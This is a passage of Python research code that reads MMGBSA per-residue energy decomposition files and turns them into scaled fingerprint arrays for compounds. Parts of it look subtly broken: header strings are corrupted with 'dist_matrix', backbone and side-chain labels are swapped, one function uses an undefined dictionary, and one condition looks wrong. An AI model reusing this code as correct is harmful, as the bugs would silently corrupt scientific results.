1:\r\n title, new_y = 'standard scaling', -1.0 * scale(y)\r\n elif mode == 2:\r\n title, new_y = 'min-max scaling', -1.0 * minmax_scale(y, feature_range=(0, 0.8))\r\n elif mode == 3:\r\n title, new_y = 'max-abs scaling', -1.0 * maxabs_scale(y)\r\n elif mode == 4:\r\n title, new_y = 'robust scaling', [n[0] for n in -1.0 * robust_scale(y.reshape(-1,1), quantile_range=(25, 75))]\r\n elif mode == 5:\r\n title, new_y = 'quantile transformation (uniform pdf)', [n[0] for n in -1.0 * quantile_transform(y.reshape(-1,1), output_distribution='uniform')]\r\n elif mode == 6:\r\n title, new_y = 'quantile transformation (gaussian pdf)', [n[0] for n in -1.0 * quantile_transform(y.reshape(-1,1), output_distribution='normal')]\r\n elif mode == 7:\r\n title, new_y = 'sample-wise L2 normalizing', [n[0] for n in -1.0 * normalize(y.reshape(-1,1), axis=0)]\r\n elif mode == 8:\r\n title, new_y = 'logIt transformation', 1000 * self.logIt(y, minus=True)\r\n elif mode == 9:\r\n title, new_y = 'DeltaG transformation', self.Ki2DeltaG(1.0 / (y+1)) # y+1 to avoid devision by zero\r\n elif mode == 10:\r\n title, new_y = 'DeltaG transformation', self.Ki2DeltaG(0.1 / (y+1)) # y+1 to avoid devision by zero\r\n elif mode == 11:\r\n y2 = minmax_scale(y, feature_range=(0.001, 1000.0))\r\n title, new_y = 'DeltaG transformation', self.Ki2DeltaG(1 / (y2+1)) # y2+1 to avoid devision by zero\r\n \r\n new_y = list(new_y)\r\n molname_score_dict = {}\r\n for k,v in zip(molnames_list, new_y):\r\n molname_score_dict[k] = v\r\n if not (ref_FE or ref_Kd):\r\n min_score = min(new_y) # the best score\r\n min_indx = new_y.index(min_score)\r\n refmolname = molnames_list[min_indx]\r\n ref_FE = refmolname + \" -12.0\" # if not given, assume that the lowest free energy is -12 kcal/mol\r\n \r\n transformed_y = []\r\n # molname_score_dict = self.transform2FE(molname_score_dict, FE=ref_FE, Kd=ref_Kd) \r\n for molname in molnames_list:\r\n transformed_y.append(molname_score_dict[molname])\r\n \r\n print(\"Applying \" + title + \" to the percent Inhibition values.\")\r\n return transformed_y\r\n \r\n \r\n def Activity2DeltaG(self, y, RT=0.5957632602):\r\n for lig,act in list(ligand_Ki_dict.items()):\r\n Ki = 1001-1000*act # if act=1 then Ki=1, else if act=0 then Ki=1001\r\n ligand_Ki_dict[lig] = Ki\r\n \r\n \r\n def read_decomposition_file(self, compound, decomposition_file):\r\n \"\"\"\r\n FUNCTION to read the MMGBSA energy decomposition file and populate the following dictionaries:\r\n self.compound_residue_LIG_decompositionArray_mdict: # e.g. CHEMBL389589 -> Y90 -> array([[ 0., 0., 0.],\r\n [-0.09816667, 0.00823441, 0.00336168],\r\n [-0.10116667, 0.01739173, 0.00710014],\r\n [-0.02983333, 0.02034221, 0.00830467],\r\n [-0.014874, 0.0056095, 0.00229007],\r\n [-0.24404067, 0.02109776, 0.00861312]])\r\n These are: ['Internal mean', 'Internal stdev', 'Internal stderr',\r\n 'van der Waals mean', 'van der Waals stdev', 'van der Waals stderr',\r\n 'Electrostatic mean', 'Electrostatic stdev', 'Electrostatic stderr',\r\n 'Polar Solvation mean', 'Polar Solvation stdev', 'Polar Solvation stderr',\r\n 'Non-Polar Solv. mean', 'Non-Polar Solv. stdev', 'Non-Polar Solv. stderr',\r\n 'TOTAL mean', 'TOTAL stdev', 'TOTAL stderr']\r\n self.contibution_dict: # e.g. Y90 -> (-0.24404066666666666, 0.021097757259218076, 0.0086131233336973357, 0.02510132318980977, 0.086451809640543831, 0.035293803493259335)\r\n \"\"\"\r\n \r\n print(\"Reading compound\", compound, \" and decomposition file\", decomposition_file)\r\n with open (decomposition_file, 'r') as f:\r\n contents = f.readlines()\r\n \r\n #headers=contents[7].rstrip().split(\",\")\r\n LIG_residue_decompositionArray_dict = {}\r\n \r\n # Read and save the backbone DeltaG decomposition\r\n start = contents.index(\"S,i,d,e,c,h,a,i,n, ,E,n,e,r,g,y, ,D,e,c,o,dist_matrix,p,o,s,i,t,i,o,n,:\\r\\n\") + 3\r\n prefix = \"sc_\"\r\n for line in contents[start:]:\r\n components = line.rstrip().split(\",\")\r\n if len(components) != 20:\r\n continue\r\n # just to populate self.resid2residue_dict\r\n residue1 = components[0] # e.g. 'ASP 98'\r\n residue2 = components[1] # e.g. 'ASP 98'\r\n resid1 = residue1.split()[1]\r\n resid2 = residue2.split()[1]\r\n self.resid2residue_dict[resid1] = residue1\r\n self.resid2residue_dict[resid2] = residue2\r\n if \"LIG\" in residue1.split()[0] and not \"LIG\" in residue2.split()[0]:\r\n self.LIG_resid = components[0].split()[1]\r\n # print(\"DEBUG: components=\", components)\r\n LIG_residue_decompositionArray_dict[prefix + residue2] = np.zeros((6,3))\r\n row = -1\r\n col = 0\r\n for c in components[2:]:\r\n if col % 3 == 0:\r\n row +=1\r\n col = 0\r\n LIG_residue_decompositionArray_dict[prefix + components[1]][row, col] = float(c)\r\n col += 1\r\n elif \"LIG\" in residue2.split()[0] and not \"LIG\" in residue1.split()[0]:\r\n # print(\"DEBUG: components=\", components)\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1] = np.zeros((6,3))\r\n row = -1\r\n col = 0\r\n for c in components[2:]:\r\n if col % 3 == 0:\r\n row +=1\r\n col = 0\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1][row, col] = float(c)\r\n col += 1\r\n \r\n # Read and save the side-chain DeltaG decomposition\r\n start = contents.index(\"B,a,c,k,b,o,n,e, ,E,n,e,r,g,y, ,D,e,c,o,dist_matrix,p,o,s,i,t,i,o,n,:\\r\\n\") + 3\r\n prefix = \"bb_\"\r\n for line in contents[start:]:\r\n components = line.rstrip().split(\",\")\r\n if len(components) != 20:\r\n continue\r\n # just to populate self.resid2residue_dict\r\n residue1 = components[0] # e.g. 'ASP 98'\r\n residue2 = components[1] # e.g. 'ASP 98'\r\n resid1 = residue1.split()[1]\r\n resid2 = residue2.split()[1]\r\n self.resid2residue_dict[resid1] = residue1\r\n self.resid2residue_dict[resid2] = residue2\r\n if \"LIG\" in residue1.split()[0] and not \"LIG\" in residue2.split()[0]:\r\n self.LIG_resid = components[0].split()[1]\r\n # print(\"DEBUG: components=\", components)\r\n LIG_residue_decompositionArray_dict[prefix + residue2] = np.zeros((6,3))\r\n row = -1\r\n col = 0\r\n for c in components[2:]:\r\n if col % 3 == 0:\r\n row +=1\r\n col = 0\r\n LIG_residue_decompositionArray_dict[prefix + components[1]][row, col] = float(c)\r\n col += 1\r\n elif \"LIG\" in residue2.split()[0] and not \"LIG\" in residue1.split()[0]:\r\n # print(\"DEBUG: components=\", components)\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1] = np.zeros((6,3))\r\n row = -1\r\n col = 0\r\n for c in components[2:]:\r\n if col % 3 == 0:\r\n row +=1\r\n col = 0\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][prefix + residue1][row, col] = float(c)\r\n col += 1\r\n \r\n \r\n # print(\"DEBUG: LIG_residue_decompositionArray_dict=\", LIG_residue_decompositionArray_dict)\r\n # CALCULATE PERCENT CONTIBUTION OF EACH RESIDUE TO THE TOTAL ENERGY\r\n residue_TOTAL_std_err_tuple_list = [(r, self.compound_residue_LIG_decompositionArray_mdict[compound][r][5][0], self.compound_residue_LIG_decompositionArray_mdict[compound][r][5][1], self.compound_residue_LIG_decompositionArray_mdict[compound][r][5][2]) for r in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())]\r\n residue_TOTAL_std_err_tuple_list.sort(key=itemgetter(1,3))\r\n # print(residue_TOTAL_std_err_tuple_list)\r\n TOTAL_ENERGY = 0\r\n for q in residue_TOTAL_std_err_tuple_list:\r\n TOTAL_ENERGY += q[1]\r\n # print(\"TOTAT ENERGY=\", TOTAL_ENERGY)\r\n self.residue_DeltaG_dict = {} # residue -> [total E, stdev, stderr]\r\n self.residue_DeltaGcontribution_dict = {} # residue -> [total E contribution, stdev_contr, stderr_contr]\r\n for q in residue_TOTAL_std_err_tuple_list:\r\n resname = q[0].split()[0]\r\n resid = q[0].split()[1]\r\n total_contr = np.divide(q[1], TOTAL_ENERGY)\r\n stdev_contr = np.divide(q[2], abs(q[1]))\r\n stderr_contr = np.divide(q[3], abs(q[1]))\r\n self.residue_DeltaG_dict[resname + resid] = [q[1], q[2], q[3]]\r\n self.residue_DeltaGcontribution_dict[resname + resid] = [q[1], q[2], q[3], total_contr, stdev_contr, stderr_contr]\r\n \r\n # # APPLY FILTERS TO THE TOTAL CONTRIBUTION AND TOTAL STDEV OF EACH RESIDUE\r\n # for c in contibution_dict:\r\n # if c[4] < TOTAL_CONTRIBUTION_THRESHOLD or c[5] > STDEV_CONTRIBUTION_THRESHOLD:\r\n # print(\"DEBUG: excluding \", c)\r\n # else:\r\n # print(c)\r\n \r\n \r\n def read_perframe_decomposition_file(self, compound, perframe_decomposition_file, include_skewness=False):\r\n \"\"\"\r\n FUNCTION to read the per-frame MMGBSA energy decomposition file and populate the following dictionary:\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict: # e.g. CHEMBL389589 -> 3 -> Y90 -> [\r\n [0.0, 1.207, -6.483, -6.768, 7.2159552, -4.8280448],\r\n [0.0,-0.751,-6.509,-8.141,6.9924096,-8.4085904],\r\n [0.0,-0.358,-6.418,-7.064,7.1629488,-6.6770512],\r\n [0.0,0.639,-7.26,-7.322,7.1511264,-6.7918736],\r\n [0.0,-0.563,-7.883,-6.941,7.2378936000000005,-8.1491064],\r\n [0.0,-0.128,-7.305,-7.148,7.107314399999999,-7.4736856000000005],\r\n [0.0,-0.822,-5.277,-7.924,7.1322192,-6.8907808],\r\n [0.0,-1.075,-6.24,-8.215,7.0330032000000005,-8.496996800000002],\r\n ]\r\n The terms in the array are [Internal, van der Waals, Electrostatic, Polar Solvation, Non-Polar Solv., TOTAL], one for each frame.\r\n \"\"\"\r\n self.include_skewness = include_skewness\r\n \r\n print(\"Reading compound\", compound, \" and per-frame decomposition file\", perframe_decomposition_file)\r\n # print(\"DEBUG read_perframe_decomposition_file: self.compound_residue_LIG_decompositionArray_mdict[compound]=\", self.compound_residue_LIG_decompositionArray_mdict[compound])\r\n with open (perframe_decomposition_file, 'r') as f:\r\n contents = f.readlines()\r\n \r\n #headers=contents[7].rstrip().split(\",\")\r\n LIG_residue_decompositionArray_dict = {}\r\n \r\n # Read and save the backbone DeltaG per-frame decomposition\r\n start = contents.index(\"DELTA,Backbone Energy Decomposition:\\r\\n\") + 2\r\n prefix = \"bb_\"\r\n for line in contents[start:]:\r\n components = line.rstrip().split(\",\")\r\n if not len(components) == 9:\r\n break\r\n [frame, residue1, residue2, Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] = line.rstrip().split(',')\r\n residue1 = prefix + residue1\r\n residue2 = prefix + residue2\r\n # print(\"DEBUG: energy line=\", line)\r\n Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL = float(Internal), float(vdW), float(Elec), float(Pol_Solv), float(NonPola_Solv), float(TOTAL)\r\n # The values residue1,residue2 are slightly different than the values residue2,residue1, therefore they will be both stored and averaged at the end.\r\n if \"LIG\" in residue2 and not \"LIG\" in residue1:\r\n # print(\"DEBUG: components=\", components)\r\n # print(\"DEBUG: saving energies of residue1=\", residue1)\r\n if not residue1 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] ]\r\n else:\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1].append( [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] )\r\n if \"LIG\" in residue1 and \"LIG\" in residue2:\r\n # print(\"DEBUG: components=\", components)\r\n # print(\"DEBUG: saving energies of residue2=\", residue2)\r\n if not residue2 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue2] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] ]\r\n else:\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue2].append( [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] )\r\n \r\n # Read and save the side-chain DeltaG per-frame decomposition\r\n start = contents.index(\"DELTA,Sidechain Energy Decomposition:\\r\\n\") + 2\r\n prefix = \"sc_\"\r\n for line in contents[start:]:\r\n components = line.rstrip().split(\",\")\r\n if not len(components) == 9:\r\n break\r\n [frame, residue1, residue2, Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] = line.rstrip().split(',')\r\n residue1 = prefix + residue1\r\n residue2 = prefix + residue2\r\n # print(\"DEBUG: energy line=\", line)\r\n Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL = float(Internal), float(vdW), float(Elec), float(Pol_Solv), float(NonPola_Solv), float(TOTAL)\r\n # The values residue1,residue2 are slightly different than the values residue2,residue1, therefore they will be both stored and averaged at the end.\r\n if \"LIG\" in residue2 and not \"LIG\" in residue1:\r\n # print(\"DEBUG: components=\", components)\r\n # print(\"DEBUG: saving energies of residue1=\", residue1)\r\n if not residue1 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] ]\r\n else:\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue1].append( [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] )\r\n if \"LIG\" in residue1 and not \"LIG\" in residue2:\r\n # print(\"DEBUG: components=\", components)\r\n # print(\"DEBUG: saving energies of residue2=\", residue2)\r\n if not residue2 in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue2] = [ [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] ]\r\n else:\r\n self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue2].append( [Internal, vdW, Elec, Pol_Solv, NonPola_Solv, TOTAL] )\r\n \r\n if self.include_skewness == True:\r\n # Calculate the mean, stdev, stderr and skewness\r\n # print(\"DEBUG: point 1 self.perframe_compound_residue_LIG_decompositionArray_mdict[compound]=\", self.perframe_compound_residue_LIG_decompositionArray_mdict[compound])\r\n for residue in list(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][residue] = [] # The residue in this case is just the resid number\r\n # print(\"DEBUG: residue=\", residue, \"self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue]=\", self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue])\r\n for mean,stdev,stderr,skewness in zip(np.mean(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue], axis=0).tolist(),\r\n np.std(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue], axis=0).tolist(),\r\n stats.sem(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue], axis=0).tolist(),\r\n stats.skew(self.perframe_compound_residue_LIG_decompositionArray_mdict[compound][residue], axis=0).tolist()):\r\n # print(\"DEBUG: appending \", [mean, stdev, stderr, skewness], \" to residue \", residue, \" and compound \", compound)\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][residue].append( [mean, stdev, stderr, skewness] )\r\n # print(\"DEBUG: point 1.5 self.compound_residue_LIG_decompositionArray_mdict[compound][residue]=\", self.compound_residue_LIG_decompositionArray_mdict[compound][residue])\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][residue] = np.array(self.compound_residue_LIG_decompositionArray_mdict[compound][residue])\r\n # print(\"DEBUG: point 2 self.compound_residue_LIG_decompositionArray_mdict[compound]\", self.compound_residue_LIG_decompositionArray_mdict[compound])\r\n \r\n \r\n def get_MMGBSA_fp_term_decomposition(self, compound_list, scale=True, only_terms=True, get_reslist=False, binnedDeltaG=False,\r\n include_skewness=None):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints of all the compounds in compound_list. The fingerprint(will\r\n contain the values of the terms 'van der Waals mean', 'van der Waals stdev', 'Electrostatic mean', 'Electrostatic stdev',\r\n 'Polar Solvation mean', 'Polar Solvation stdev', 'Non-Polar Solv. mean', 'Non-Polar Solv. stdev' and optionally the 'Total DeltaG'\r\n and 'Total DeltaG stdev'.\r\n \r\n ARGS:\r\n only_terms: if True then only 'van der Waals mean', 'van der Waals stdev', 'Electrostatic mean', 'Electrostatic stdev',\r\n 'Polar Solvation mean', 'Polar Solvation stdev', 'Non-Polar Solv. mean', 'Non-Polar Solv. stdev' are returned.\r\n if False then 'Internal mean', 'Internal stdev' are included, too.\r\n scale: if True then the actual values and the stdev will be scaled separately.\r\n skewness: if True, then include the 3rd distribution moment (skewness) along with the average value of each term and its stdev.\r\n\r\n \"\"\"\r\n \r\n residue_set = set()\r\n # print(\"DEBUG: self.compound_residue_LIG_decompositionArray_mdict=\", self.compound_residue_LIG_decompositionArray_mdict)\r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n residue_set.add(residue)\r\n residue_list = list(residue_set) # all the residues that have interactions in all pocket files\r\n # print(\"DEBUG: residue_list=\", residue_list)\r\n \r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if only_terms == True and self.include_skewness == False:\r\n MMGBSA_fp = np.zeros(4*2)\r\n elif only_terms == False and self.include_skewness == False:\r\n MMGBSA_fp = np.zeros(5*2)\r\n elif only_terms == True and self.include_skewness == True:\r\n MMGBSA_fp = np.zeros(4*3)\r\n elif only_terms == False and self.include_skewness == True:\r\n MMGBSA_fp = np.zeros(5*3)\r\n else:\r\n if only_terms == True and self.include_skewness == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][1:5,0:2].ravel() # the full MMGBSA fingeprint(for this compound\r\n elif only_terms == False and self.include_skewness == False:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:5,0:2].ravel() # the full MMGBSA fingeprint(for this compound\r\n elif only_terms == True and self.include_skewness == True:\r\n # include the 4th column in each line, which is the skewness\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][1:5,[0,1,3]].ravel() # the full MMGBSA fingeprint(for this compound\r\n elif only_terms == False and self.include_skewness == True:\r\n # include the 4th column in each line, which is the skewness\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:5,[0,1,3]].ravel() # the full MMGBSA fingeprint(for this compound\r\n \r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n if only_terms == True and self.include_skewness == False:\r\n a6 = np.zeros(4*2)\r\n elif only_terms == False and self.include_skewness == False:\r\n a6 = np.zeros(5*2)\r\n elif only_terms == True and self.include_skewness == True:\r\n a6 = np.zeros(4*3)\r\n elif only_terms == False and self.include_skewness == True:\r\n a6 = np.zeros(5*3)\r\n else:\r\n if only_terms == True and self.include_skewness == False:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][1:5,0:2] # ommit the 1st and 6th rows which are the Internal and Total DeltaG\r\n elif only_terms == False and self.include_skewness == False:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:5,0:2] # ommit the 6th row which is the Total DeltaG\r\n elif only_terms == True and self.include_skewness == True:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][1:5,[0,1,3]] # ommit the 1st and 6th rows which are the Internal and Total DeltaG\r\n elif only_terms == False and self.include_skewness == True:\r\n # print(\"DEBUG: residue=\", residue, \"self.compound_residue_LIG_decompositionArray_mdict[compound][residue]=\", self.compound_residue_LIG_decompositionArray_mdict[compound][residue].tolist())\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:5,[0,1,3]] # ommit the 6th row which is the Total DeltaG\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if binnedDeltaG and not self.include_skewness:\r\n MMGBSA_fp_list = self.get_binnedDeltaG(MMGBSA_fp_list) # MMGBSA_fp_list now contrains only binned DeltaG, no stdev\r\n \r\n residue_list = [r.split()[0]+r.split()[1] for r in residue_list] # make the format compatible with SiFt\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n # ## scale separately the means and the stdevs\r\n # Xmax1 = np.max(MMGBSA_fp_array[:, 0::2])\r\n # Xmin1 = np.min(MMGBSA_fp_array[:, 0::2])\r\n # Xmax2 = np.max(MMGBSA_fp_array[:, 1::2])\r\n # Xmin2 = np.min(MMGBSA_fp_array[:, 1::2])\r\n # MMGBSA_fp_array[:, 0::2] = (MMGBSA_fp_array[:, 0::2] - Xmin1) / float(Xmax1 - Xmin1)\r\n # MMGBSA_fp_array[:, 1::2] = (MMGBSA_fp_array[:, 1::2] - Xmin2) / float(Xmax2 - Xmin2)\r\n # shift1 = (0.0 - Xmin1) / float(Xmax1 - Xmin1)\r\n # shift2 = (0.0 - Xmin2) / float(Xmax2 - Xmin2)\r\n # MMGBSA_fp_array = MMGBSA_fp_array[:, 0::2] - shift1\r\n # MMGBSA_fp_array = MMGBSA_fp_array[:, 1::2] - shift2\r\n \r\n ## alternativelly scale them all together (here I assume that there is at least one negative value)\r\n Xmax = np.max(MMGBSA_fp_array)\r\n Xmin = np.min(MMGBSA_fp_array)\r\n MMGBSA_fp_array = (MMGBSA_fp_array - Xmin) / float(Xmax - Xmin)\r\n shift = (0.0 - Xmin) / float(Xmax - Xmin)\r\n MMGBSA_fp_array = MMGBSA_fp_array - shift\r\n multiplier = -1.0/np.min(MMGBSA_fp_array) # assuming that there is at least one negative value!\r\n MMGBSA_fp_array = multiplier * MMGBSA_fp_array\r\n \r\n if self.include_skewness:\r\n Xmax3 = np.max(MMGBSA_fp_array[:, 2::2])\r\n Xmin3 = np.min(MMGBSA_fp_array[:, 2::2])\r\n MMGBSA_fp_array[:, 2::2] = (MMGBSA_fp_array[:, 2::2] - Xmin3) / float(Xmax3 - Xmin3)\r\n if get_reslist:\r\n return list(MMGBSA_fp_array), residue_list\r\n else:\r\n return list(MMGBSA_fp_array)\r\n \r\n if get_reslist:\r\n return MMGBSA_fp_list, residue_list\r\n else:\r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def get_full_MMGBSA_fp_list(self, compound_list, scale=True):\r\n \"\"\"\r\n FUNCTION to create and return an array with the full MMGBSA fingerprints of all the compounds in compound_list.\r\n \"\"\"\r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_list = list(self.compound_residue_LIG_decompositionArray_mdict[compound_list[0]].keys())\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n compounds2remove_set = set()\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n compounds2remove_set.add(compound)\r\n MMGBSA_fp = np.zeros(18)\r\n else:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]].ravel() # the full MMGBSA fingeprint(for this compound\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n compounds2remove_set.add(compound)\r\n a6x3 = np.zeros(18)\r\n else:\r\n a6x3 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue]\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6x3.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n print(\"DDEBUG: compounds2remove_set=\", compounds2remove_set)\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n Xmax1 = np.max(MMGBSA_fp_array[:, 0::3])\r\n Xmin1 = np.min(MMGBSA_fp_array[:, 0::3])\r\n Xmax2 = np.max(MMGBSA_fp_array[:, 1::3])\r\n Xmin2 = np.min(MMGBSA_fp_array[:, 1::3])\r\n Xmax3 = np.max(MMGBSA_fp_array[:, 2::3])\r\n Xmin3 = np.min(MMGBSA_fp_array[:, 2::3])\r\n MMGBSA_fp_array[:, 0::3] = (MMGBSA_fp_array[:, 0::3] - Xmin1) / float(Xmax1 - Xmin1)\r\n MMGBSA_fp_array[:, 1::3] = (MMGBSA_fp_array[:, 1::3] - Xmin2) / float(Xmax2 - Xmin2)\r\n MMGBSA_fp_array[:, 2::3] = (MMGBSA_fp_array[:, 2::3] - Xmin3) / float(Xmax3 - Xmin3)\r\n return list(MMGBSA_fp_array), compounds2remove_set\r\n \r\n return MMGBSA_fp_list, compounds2remove_set\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def get_MMGBSA_fp_list(self, compound_list, scale=True):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints (E only) of all the compounds in compound_list.\r\n \"\"\"\r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_list = list(self.compound_residue_LIG_decompositionArray_mdict[compound_list[0]].keys())\r\n MMGBSA_fp_list = [] # initialize it as a list to append the fingerprints and the convert it to array\r\n for compound in compound_list:\r\n # print(compound)\r\n # print(self.compound_residue_LIG_decompositionArray_mdict[compound].keys())\r\n if not residue_list[0] in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n MMGBSA_fp = np.zeros(6)\r\n else:\r\n MMGBSA_fp = self.compound_residue_LIG_decompositionArray_mdict[compound][residue_list[0]][:,0].ravel() # the full MMGBSA fingeprint(for this compound\r\n for residue in residue_list[1:]:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n a6 = np.zeros(6)\r\n else:\r\n a6 = self.compound_residue_LIG_decompositionArray_mdict[compound][residue][:,0]\r\n MMGBSA_fp = np.append(MMGBSA_fp , a6.ravel())\r\n MMGBSA_fp_list.append(MMGBSA_fp)\r\n \r\n if scale == True:\r\n MMGBSA_fp_array = np.array(MMGBSA_fp_list, dtype=float)\r\n Xmax = np.max(MMGBSA_fp_array)\r\n Xmin = np.min(MMGBSA_fp_array)\r\n X_scaled = (MMGBSA_fp_array - Xmin) / float(Xmax - Xmin)\r\n return list(X_scaled)\r\n \r\n return MMGBSA_fp_list\r\n # return np.array(MMGBSA_fp_list, dtype=float)\r\n \r\n \r\n def fillin_missing_residues(self):\r\n \"\"\"\r\n Function to make all compounds to have the same set of residues in self.compound_residue_LIG_decompositionArray_mdict. For those that did\r\n not exist an 6x3 array of zeros will be added.\r\n \r\n \"\"\"\r\n residue_set = set()\r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n residue_set.add(residue)\r\n \r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in residue_set:\r\n if not residue in list(self.compound_residue_LIG_decompositionArray_mdict[compound].keys()):\r\n self.compound_residue_LIG_decompositionArray_mdict[compound][residue] = np.zeros((6,3))\r\n \r\n \r\n def get_binnedDeltaG(self, MMGBSA_fp_list):\r\n \"\"\"\r\n It is assumed here that MMGBSA_fp_list contains DeltaG+stdev or DeltaG+stderr. Then the DeltaG is placed into bins with size that of the\r\n largest stdev or stderr. In this case the noise in the measurements is reduced.\r\n \r\n RETURNS:\r\n binned_mmgbsa_fp_list: a list of arrays with the binned DeltaG contribution of each residue (without the stdev).\r\n \"\"\"\r\n \r\n max_stdev = 0.0\r\n for mmgbsa_fp in MMGBSA_fp_list:\r\n for stdev in mmgbsa_fp[1::2]: # it works also for stderr\r\n if stdev > max_stdev:\r\n max_stdev = stdev\r\n \r\n binned_mmgbsa_fp_list = []\r\n for mmgbsa_fp in MMGBSA_fp_list:\r\n binned_mmgbsa_fp = np.round(mmgbsa_fp[0::2]/max_stdev)\r\n binned_mmgbsa_fp_list.append(binned_mmgbsa_fp)\r\n \r\n return binned_mmgbsa_fp_list\r\n \r\n \r\n def get_DeltaG_fp_list(self, compound_list, scale=True, stdev=True, stderr=False, get_reslist=False, binnedDeltaG=False):\r\n \"\"\"\r\n FUNCTION to create and return an array with the MMGBSA fingerprints of all the compounds in compound_list. The fingerprints will contain\r\n the DeltaG contribution of each residue to the total DeltaG, and optionally the stdev and/or the stderr. The function takes care to include\r\n for each compound all the residues that have occured in the energy decomposition files. Those that are absent from a compound, are fill in\r\n with zeros. Consequently, at the end the mmgbsa_fg of each compound will have the same length\r\n \r\n ARGS:\r\n scale: if True then the actual values and the stdev will be scaled separately.\r\n\r\n \"\"\"\r\n \r\n # self.fillin_missing_residues() # function to add for every compound, arrays of zeros in place of residues that were too far to be analyzed \r\n if binnedDeltaG: # we need the stdev to bin the energy!\r\n stdev=True\r\n stderr=False\r\n \r\n # compound_list = self.compound_residue_LIG_decompositionArray_mdict.keys()\r\n residue_set = set()\r\n for compound in list(self.compound_residue_LIG_decompositionArray_mdict.keys()):\r\n for residue in 